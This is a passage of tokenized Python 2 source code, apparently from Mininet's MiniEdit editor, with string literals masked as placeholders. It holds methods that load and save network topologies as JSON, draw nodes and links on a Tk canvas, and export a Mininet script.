nodePrefixes [ node ] + nodeNum <EOL> self . addNamedNode ( node , name , x , y ) <EOL> def addNamedNode ( self , node , name , x , y ) : <EOL> "<STR_LIT>" <EOL> icon = self . nodeIcon ( node , name ) <EOL> item = self . canvas . create_window ( x , y , anchor = '<STR_LIT:c>' , window = icon , <EOL> tags = node ) <EOL> self . widgetToItem [ icon ] = item <EOL> self . itemToWidget [ item ] = icon <EOL> icon . links = { } <EOL> def convertJsonUnicode ( self , text ) : <EOL> "<STR_LIT>" <EOL> if isinstance ( text , dict ) : <EOL> return { self . convertJsonUnicode ( key ) : self . convertJsonUnicode ( value ) for key , value in text . iteritems ( ) } <EOL> elif isinstance ( text , list ) : <EOL> return [ self . convertJsonUnicode ( element ) for element in text ] <EOL> elif isinstance ( text , unicode ) : <EOL> return text . encode ( '<STR_LIT:utf-8>' ) <EOL> else : <EOL> return text <EOL> def loadTopology ( self ) : <EOL> "<STR_LIT>" <EOL> c = self . canvas <EOL> myFormats = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:*>' ) , <EOL> ] <EOL> f = tkFileDialog . askopenfile ( filetypes = myFormats , mode = '<STR_LIT:rb>' ) <EOL> if f == None : <EOL> return <EOL> self . newTopology ( ) <EOL> loadedTopology = self . convertJsonUnicode ( json . load ( f ) ) <EOL> if '<STR_LIT>' in loadedTopology : <EOL> self . appPrefs = dict ( self . appPrefs . items ( ) + loadedTopology [ '<STR_LIT>' ] . items ( ) ) <EOL> if "<STR_LIT>" not in self . appPrefs [ "<STR_LIT>" ] : <EOL> self . appPrefs [ "<STR_LIT>" ] [ "<STR_LIT>" ] = '<STR_LIT:0>' <EOL> if "<STR_LIT>" not in self . appPrefs [ "<STR_LIT>" ] : <EOL> self . appPrefs [ "<STR_LIT>" ] [ "<STR_LIT>" ] = '<STR_LIT:0>' <EOL> if "<STR_LIT>" not in self . appPrefs [ "<STR_LIT>" ] : <EOL> self . appPrefs [ "<STR_LIT>" ] [ "<STR_LIT>" ] = '<STR_LIT:0>' <EOL> if "<STR_LIT>" not in self . appPrefs [ "<STR_LIT>" ] : <EOL> self . appPrefs [ "<STR_LIT>" ] [ "<STR_LIT>" ] = '<STR_LIT:0>' <EOL> if "<STR_LIT>" not in self . appPrefs : <EOL> self . appPrefs [ "<STR_LIT>" ] = self . sflowDefaults <EOL> if "<STR_LIT>" not in self . appPrefs : <EOL> self . appPrefs [ "<STR_LIT>" ] = self . nflowDefaults <EOL> if '<STR_LIT>' in loadedTopology : <EOL> if loadedTopology [ '<STR_LIT:version>' ] == '<STR_LIT:1>' : <EOL> hostname = '<STR_LIT>' <EOL> self . controllers = { } <EOL> self . controllers [ hostname ] = loadedTopology [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . controllers [ hostname ] [ '<STR_LIT>' ] = hostname <EOL> self . addNode ( '<STR_LIT>' , <NUM_LIT:0> , float ( <NUM_LIT:30> ) , float ( <NUM_LIT:30> ) , name = hostname ) <EOL> icon = self . findWidgetByName ( hostname ) <EOL> icon . bind ( '<STR_LIT>' , self . do_controllerPopup ) <EOL> else : <EOL> controllers = loadedTopology [ '<STR_LIT>' ] <EOL> for controller in controllers : <EOL> hostname = controller [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> x = controller [ '<STR_LIT:x>' ] <EOL> y = controller [ '<STR_LIT:y>' ] <EOL> self . addNode ( '<STR_LIT>' , <NUM_LIT:0> , float ( x ) , float ( y ) , name = hostname ) <EOL> self . controllers [ hostname ] = controller [ '<STR_LIT>' ] <EOL> icon = self . findWidgetByName ( hostname ) <EOL> icon . bind ( '<STR_LIT>' , self . do_controllerPopup ) <EOL> hosts = loadedTopology [ '<STR_LIT>' ] <EOL> for host in hosts : <EOL> nodeNum = host [ '<STR_LIT>' ] <EOL> hostname = '<STR_LIT:h>' + nodeNum <EOL> if '<STR_LIT>' in host [ '<STR_LIT>' ] : <EOL> hostname = host [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> else : <EOL> host [ '<STR_LIT>' ] [ '<STR_LIT>' ] = hostname <EOL> if '<STR_LIT>' not in host [ '<STR_LIT>' ] : <EOL> host [ '<STR_LIT>' ] [ '<STR_LIT>' ] = int ( nodeNum ) <EOL> x = host [ '<STR_LIT:x>' ] <EOL> y = host [ '<STR_LIT:y>' ] <EOL> self . addNode ( '<STR_LIT>' , nodeNum , float ( x ) , float ( y ) , name = hostname ) <EOL> if '<STR_LIT>' in host [ '<STR_LIT>' ] : <EOL> newDirList = [ ] <EOL> for privateDir in host [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> if isinstance ( privateDir , list ) : <EOL> newDirList . append ( ( privateDir [ <NUM_LIT:0> ] , privateDir [ <NUM_LIT:1> ] ) ) <EOL> else : <EOL> newDirList . append ( privateDir ) <EOL> host [ '<STR_LIT>' ] [ '<STR_LIT>' ] = newDirList <EOL> self . hostOpts [ hostname ] = host [ '<STR_LIT>' ] <EOL> icon = self . findWidgetByName ( hostname ) <EOL> icon . bind ( '<STR_LIT>' , self . do_hostPopup ) <EOL> switches = loadedTopology [ '<STR_LIT>' ] <EOL> for switch in switches : <EOL> nodeNum = switch [ '<STR_LIT>' ] <EOL> hostname = '<STR_LIT:s>' + nodeNum <EOL> if '<STR_LIT>' not in switch [ '<STR_LIT>' ] : <EOL> switch [ '<STR_LIT>' ] [ '<STR_LIT>' ] = [ ] <EOL> if '<STR_LIT>' not in switch [ '<STR_LIT>' ] : <EOL> switch [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:default>' <EOL> if '<STR_LIT>' in switch [ '<STR_LIT>' ] : <EOL> hostname = switch [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> else : <EOL> switch [ '<STR_LIT>' ] [ '<STR_LIT>' ] = hostname <EOL> if '<STR_LIT>' not in switch [ '<STR_LIT>' ] : <EOL> switch [ '<STR_LIT>' ] [ '<STR_LIT>' ] = int ( nodeNum ) <EOL> x = switch [ '<STR_LIT:x>' ] <EOL> y = switch [ '<STR_LIT:y>' ] <EOL> if switch [ '<STR_LIT>' ] [ '<STR_LIT>' ] == "<STR_LIT>" : <EOL> self . addNode ( '<STR_LIT>' , nodeNum , float ( x ) , float ( y ) , name = hostname ) <EOL> icon = self . findWidgetByName ( hostname ) <EOL> icon . bind ( '<STR_LIT>' , self . do_legacyRouterPopup ) <EOL> elif switch [ '<STR_LIT>' ] [ '<STR_LIT>' ] == "<STR_LIT>" : <EOL> self . addNode ( '<STR_LIT>' , nodeNum , float ( x ) , float ( y ) , name = hostname ) <EOL> icon = self . findWidgetByName ( hostname ) <EOL> icon . bind ( '<STR_LIT>' , self . do_legacySwitchPopup ) <EOL> else : <EOL> self . addNode ( '<STR_LIT>' , nodeNum , float ( x ) , float ( y ) , name = hostname ) <EOL> icon = self . findWidgetByName ( hostname ) <EOL> icon . bind ( '<STR_LIT>' , self . do_switchPopup ) <EOL> self . switchOpts [ hostname ] = switch [ '<STR_LIT>' ] <EOL> if int ( loadedTopology [ '<STR_LIT:version>' ] ) > <NUM_LIT:1> : <EOL> controllers = self . switchOpts [ hostname ] [ '<STR_LIT>' ] <EOL> for controller in controllers : <EOL> dest = self . findWidgetByName ( controller ) <EOL> dx , dy = self . canvas . coords ( self . widgetToItem [ dest ] ) <EOL> self . link = self . canvas . create_line ( float ( x ) , <EOL> float ( y ) , <EOL> dx , <EOL> dy , <EOL> width = <NUM_LIT:4> , <EOL> fill = '<STR_LIT>' , <EOL> dash = ( <NUM_LIT:6> , <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:4> ) , <EOL> tag = '<STR_LIT>' ) <EOL> c . itemconfig ( self . link , tags = c . gettags ( self . link ) + ( '<STR_LIT>' , ) ) <EOL> self . addLink ( icon , dest , linktype = '<STR_LIT>' ) <EOL> self . createControlLinkBindings ( ) <EOL> self . link = self . linkWidget = None <EOL> else : <EOL> dest = self . findWidgetByName ( '<STR_LIT>' ) <EOL> dx , dy = self . canvas . coords ( self . widgetToItem [ dest ] ) <EOL> self . link = self . canvas . create_line ( float ( x ) , <EOL> float ( y ) , <EOL> dx , <EOL> dy , <EOL> width = <NUM_LIT:4> , <EOL> fill = '<STR_LIT>' , <EOL> dash = ( <NUM_LIT:6> , <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:4> ) , <EOL> tag = '<STR_LIT>' ) <EOL> c . itemconfig ( self . link , tags = c . gettags ( self . link ) + ( '<STR_LIT>' , ) ) <EOL> self . addLink ( icon , dest , linktype = '<STR_LIT>' ) <EOL> self . createControlLinkBindings ( ) <EOL> self . link = self . linkWidget = None <EOL> links = loadedTopology [ '<STR_LIT>' ] <EOL> for link in links : <EOL> srcNode = link [ '<STR_LIT:src>' ] <EOL> src = self . findWidgetByName ( srcNode ) <EOL> sx , sy = self . canvas . coords ( self . widgetToItem [ src ] ) <EOL> destNode = link [ '<STR_LIT>' ] <EOL> dest = self . findWidgetByName ( destNode ) <EOL> dx , dy = self . canvas . coords ( self . widgetToItem [ dest ] ) <EOL> self . link = self . canvas . create_line ( sx , sy , dx , dy , width = <NUM_LIT:4> , <EOL> fill = '<STR_LIT>' , tag = '<STR_LIT>' ) <EOL> c . itemconfig ( self . link , tags = c . gettags ( self . link ) + ( '<STR_LIT:data>' , ) ) <EOL> self . addLink ( src , dest , linkopts = link [ '<STR_LIT>' ] ) <EOL> self . createDataLinkBindings ( ) <EOL> self . link = self . linkWidget = None <EOL> f . close ( ) <EOL> def findWidgetByName ( self , name ) : <EOL> for widget in self . widgetToItem : <EOL> if name == widget [ '<STR_LIT:text>' ] : <EOL> return widget <EOL> def newTopology ( self ) : <EOL> "<STR_LIT>" <EOL> for widget in self . widgetToItem . keys ( ) : <EOL> self . deleteItem ( self . widgetToItem [ widget ] ) <EOL> self . hostCount = <NUM_LIT:0> <EOL> self . switchCount = <NUM_LIT:0> <EOL> self . controllerCount = <NUM_LIT:0> <EOL> self . links = { } <EOL> self . hostOpts = { } <EOL> self . switchOpts = { } <EOL> self . controllers = { } <EOL> self . appPrefs [ "<STR_LIT>" ] = self . defaultIpBase <EOL> def saveTopology ( self ) : <EOL> "<STR_LIT>" <EOL> myFormats = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:*>' ) , <EOL> ] <EOL> savingDictionary = { } <EOL> fileName = tkFileDialog . asksaveasfilename ( filetypes = myFormats , title = "<STR_LIT>" ) <EOL> if len ( fileName ) > <NUM_LIT:0> : <EOL> savingDictionary [ '<STR_LIT:version>' ] = '<STR_LIT:2>' <EOL> hostsToSave = [ ] <EOL> switchesToSave = [ ] <EOL> controllersToSave = [ ] <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> x1 , y1 = self . canvas . coords ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags or '<STR_LIT>' in tags or '<STR_LIT>' in tags : <EOL> nodeNum = self . switchOpts [ name ] [ '<STR_LIT>' ] <EOL> nodeToSave = { '<STR_LIT>' : str ( nodeNum ) , <EOL> '<STR_LIT:x>' : str ( x1 ) , <EOL> '<STR_LIT:y>' : str ( y1 ) , <EOL> '<STR_LIT>' : self . switchOpts [ name ] } <EOL> switchesToSave . append ( nodeToSave ) <EOL> elif '<STR_LIT>' in tags : <EOL> nodeNum = self . hostOpts [ name ] [ '<STR_LIT>' ] <EOL> nodeToSave = { '<STR_LIT>' : str ( nodeNum ) , <EOL> '<STR_LIT:x>' : str ( x1 ) , <EOL> '<STR_LIT:y>' : str ( y1 ) , <EOL> '<STR_LIT>' : self . hostOpts [ name ] } <EOL> hostsToSave . append ( nodeToSave ) <EOL> elif '<STR_LIT>' in tags : <EOL> nodeToSave = { '<STR_LIT:x>' : str ( x1 ) , <EOL> '<STR_LIT:y>' : str ( y1 ) , <EOL> '<STR_LIT>' : self . controllers [ name ] } <EOL> controllersToSave . append ( nodeToSave ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" + name ) <EOL> savingDictionary [ '<STR_LIT>' ] = hostsToSave <EOL> savingDictionary [ '<STR_LIT>' ] = switchesToSave <EOL> savingDictionary [ '<STR_LIT>' ] = controllersToSave <EOL> linksToSave = [ ] <EOL> for link in self . links . values ( ) : <EOL> src = link [ '<STR_LIT:src>' ] <EOL> dst = link [ '<STR_LIT>' ] <EOL> linkopts = link [ '<STR_LIT>' ] <EOL> srcName , dstName = src [ '<STR_LIT:text>' ] , dst [ '<STR_LIT:text>' ] <EOL> linkToSave = { '<STR_LIT:src>' : srcName , <EOL> '<STR_LIT>' : dstName , <EOL> '<STR_LIT>' : linkopts } <EOL> if link [ '<STR_LIT:type>' ] == '<STR_LIT:data>' : <EOL> linksToSave . append ( linkToSave ) <EOL> savingDictionary [ '<STR_LIT>' ] = linksToSave <EOL> savingDictionary [ '<STR_LIT>' ] = self . appPrefs <EOL> try : <EOL> f = open ( fileName , '<STR_LIT:wb>' ) <EOL> f . write ( json . dumps ( savingDictionary , sort_keys = True , indent = <NUM_LIT:4> , separators = ( '<STR_LIT:U+002C>' , '<STR_LIT>' ) ) ) <EOL> except Exception as er : <EOL> print er <EOL> finally : <EOL> f . close ( ) <EOL> def exportScript ( self ) : <EOL> "<STR_LIT>" <EOL> myFormats = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:*>' ) , <EOL> ] <EOL> fileName = tkFileDialog . asksaveasfilename ( filetypes = myFormats , title = "<STR_LIT>" ) <EOL> if len ( fileName ) > <NUM_LIT:0> : <EOL> f = open ( fileName , '<STR_LIT:wb>' ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> if StrictVersion ( MININET_VERSION ) > StrictVersion ( '<STR_LIT>' ) : <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> inBandCtrl = False <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . controllers [ name ] <EOL> controllerType = opts [ '<STR_LIT>' ] <EOL> if controllerType == '<STR_LIT>' : <EOL> inBandCtrl = True <EOL> if inBandCtrl == True : <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> if len ( self . appPrefs [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> f . write ( "<STR_LIT>" + self . appPrefs [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" + self . appPrefs [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . controllers [ name ] <EOL> controllerType = opts [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in opts : <EOL> controllerProtocol = opts [ '<STR_LIT>' ] <EOL> else : <EOL> controllerProtocol = '<STR_LIT>' <EOL> controllerIP = opts [ '<STR_LIT>' ] <EOL> controllerPort = opts [ '<STR_LIT>' ] <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT>" ) <EOL> if controllerType == '<STR_LIT>' : <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" + controllerIP + "<STR_LIT>" ) <EOL> elif controllerType == '<STR_LIT>' : <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" + controllerIP + "<STR_LIT>" ) <EOL> elif controllerType == '<STR_LIT>' : <EOL> f . write ( "<STR_LIT>" ) <EOL> else : <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" + controllerProtocol + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" + str ( controllerPort ) + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" ) <EOL> if '<STR_LIT>' in tags : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT>" ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> nodeNum = opts [ '<STR_LIT>' ] <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT:'>" ) <EOL> if opts [ '<STR_LIT>' ] == '<STR_LIT:default>' : <EOL> if self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> f . write ( "<STR_LIT>" ) <EOL> elif self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT:user>' : <EOL> f . write ( "<STR_LIT>" ) <EOL> elif self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> f . write ( "<STR_LIT>" ) <EOL> else : <EOL> f . write ( "<STR_LIT>" ) <EOL> elif opts [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> f . write ( "<STR_LIT>" ) <EOL> elif opts [ '<STR_LIT>' ] == '<STR_LIT:user>' : <EOL> f . write ( "<STR_LIT>" ) <EOL> elif opts [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> f . write ( "<STR_LIT>" ) <EOL> else : <EOL> f . write ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in opts : <EOL> f . write ( "<STR_LIT>" + opts [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in opts : <EOL> f . write ( "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT:'>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in opts : <EOL> for extInterface in opts [ '<STR_LIT>' ] : <EOL> f . write ( "<STR_LIT>" + extInterface + "<STR_LIT>" + name + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . hostOpts [ name ] <EOL> ip = None <EOL> defaultRoute = None <EOL> if '<STR_LIT>' in opts and len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> defaultRoute = "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT:'>" <EOL> else : <EOL> defaultRoute = '<STR_LIT:None>' <EOL> if '<STR_LIT>' in opts and len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> ip = opts [ '<STR_LIT>' ] <EOL> else : <EOL> nodeNum = self . hostOpts [ name ] [ '<STR_LIT>' ] <EOL> ipBaseNum , prefixLen = netParse ( self . appPrefs [ '<STR_LIT>' ] ) <EOL> ip = ipAdd ( i = nodeNum , prefixLen = prefixLen , ipBaseNum = ipBaseNum ) <EOL> if '<STR_LIT>' in opts or '<STR_LIT>' in opts : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT>" + ip + "<STR_LIT>" + defaultRoute + "<STR_LIT>" ) <EOL> if '<STR_LIT>' in opts : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> if '<STR_LIT>' in opts : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + str ( opts [ '<STR_LIT>' ] ) + "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> else : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT>" + ip + "<STR_LIT>" + defaultRoute + "<STR_LIT>" ) <EOL> if '<STR_LIT>' in opts : <EOL> for extInterface in opts [ '<STR_LIT>' ] : <EOL> f . write ( "<STR_LIT>" + extInterface + "<STR_LIT>" + name + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> for key , linkDetail in self . links . iteritems ( ) : <EOL> tags = self . canvas . gettags ( key ) <EOL> if '<STR_LIT:data>' in tags : <EOL> optsExist = False <EOL> src = linkDetail [ '<STR_LIT:src>' ] <EOL> dst = linkDetail [ '<STR_LIT>' ] <EOL> linkopts = linkDetail [ '<STR_LIT>' ] <EOL> srcName , dstName = src [ '<STR_LIT:text>' ] , dst [ '<STR_LIT:text>' ] <EOL> bw = '<STR_LIT>' <EOL> linkOpts = "<STR_LIT:{>" <EOL> if '<STR_LIT>' in linkopts : <EOL> bw = linkopts [ '<STR_LIT>' ] <EOL> linkOpts = linkOpts + "<STR_LIT>" + str ( bw ) <EOL> optsExist = True <EOL> if '<STR_LIT>' in linkopts : <EOL> if optsExist : <EOL> linkOpts = linkOpts + "<STR_LIT:U+002C>" <EOL> linkOpts = linkOpts + "<STR_LIT>" + linkopts [ '<STR_LIT>' ] + "<STR_LIT:'>" <EOL> optsExist = True <EOL> if '<STR_LIT>' in linkopts : <EOL> if optsExist : <EOL> linkOpts = linkOpts + "<STR_LIT:U+002C>" <EOL> linkOpts = linkOpts + "<STR_LIT>" + str ( linkopts [ '<STR_LIT>' ] ) <EOL> optsExist = True <EOL> if '<STR_LIT>' in linkopts : <EOL> if optsExist : <EOL> linkOpts = linkOpts + "<STR_LIT:U+002C>" <EOL> linkOpts = linkOpts + "<STR_LIT>" + str ( linkopts [ '<STR_LIT>' ] ) <EOL> optsExist = True <EOL> if '<STR_LIT>' in linkopts : <EOL> if optsExist : <EOL> linkOpts = linkOpts + "<STR_LIT:U+002C>" <EOL> linkOpts = linkOpts + "<STR_LIT>" + linkopts [ '<STR_LIT>' ] + "<STR_LIT:'>" <EOL> optsExist = True <EOL> if '<STR_LIT>' in linkopts : <EOL> if optsExist : <EOL> linkOpts = linkOpts + "<STR_LIT:U+002C>" <EOL> linkOpts = linkOpts + "<STR_LIT>" + str ( linkopts [ '<STR_LIT>' ] ) <EOL> optsExist = True <EOL> linkOpts = linkOpts + "<STR_LIT:}>" <EOL> if optsExist : <EOL> f . write ( "<STR_LIT:U+0020>" + srcName + dstName + "<STR_LIT>" + linkOpts + "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" + srcName + "<STR_LIT:U+002CU+0020>" + dstName ) <EOL> if optsExist : <EOL> f . write ( "<STR_LIT>" + srcName + dstName ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags or '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> ctrlList = "<STR_LIT:U+002C>" . join ( opts [ '<STR_LIT>' ] ) <EOL> f . write ( "<STR_LIT>" + name + "<STR_LIT>" + ctrlList + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> if opts [ '<STR_LIT>' ] == '<STR_LIT:default>' : <EOL> if self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT:user>' : <EOL> if '<STR_LIT>' in opts : <EOL> if len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT:U+0020>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> elif self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> if '<STR_LIT>' in opts : <EOL> if len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> elif self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> if '<STR_LIT>' in opts : <EOL> if len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT:U+0020>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> elif opts [ '<STR_LIT>' ] == '<STR_LIT:user>' : <EOL> if '<STR_LIT>' in opts : <EOL> if len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT:U+0020>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> elif opts [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> if '<STR_LIT>' in opts : <EOL> if len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> elif opts [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> if '<STR_LIT>' in opts : <EOL> if len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT:U+0020>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . hostOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> for vlanInterface in opts [ '<STR_LIT>' ] : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT>" + vlanInterface [ <NUM_LIT:1> ] + "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + name + "<STR_LIT>" + vlanInterface [ <NUM_LIT:1> ] + "<STR_LIT:U+0020>" + vlanInterface [ <NUM_LIT:0> ] + "<STR_LIT>" ) <EOL> if '<STR_LIT>' in opts : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> f . write ( "<STR_LIT:U+0020>" + name + "<STR_LIT>" + opts [ '<STR_LIT>' ] + "<STR_LIT>" ) <EOL> nflowValues = self . appPrefs [ '<STR_LIT>' ] <EOL> if len ( nflowValues [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> nflowEnabled = False <EOL> nflowSwitches = '<STR_LIT>' <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> if opts [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> nflowSwitches = nflowSwitches + '<STR_LIT>' + name + '<STR_LIT>' <EOL> nflowEnabled = True <EOL> if nflowEnabled : <EOL> nflowCmd = '<STR_LIT>' + '<STR_LIT>' + nflowValues [ '<STR_LIT>' ] + '<STR_LIT>' + '<STR_LIT>' + nflowValues [ '<STR_LIT>' ] <EOL> if nflowValues [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> nflowCmd = nflowCmd + '<STR_LIT>' <EOL> else : <EOL> nflowCmd = nflowCmd + '<STR_LIT>' <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" + nflowCmd + nflowSwitches + "<STR_LIT>" ) <EOL> sflowValues = self . appPrefs [ '<STR_LIT>' ] <EOL> if len ( sflowValues [ '<STR_LIT>' ] 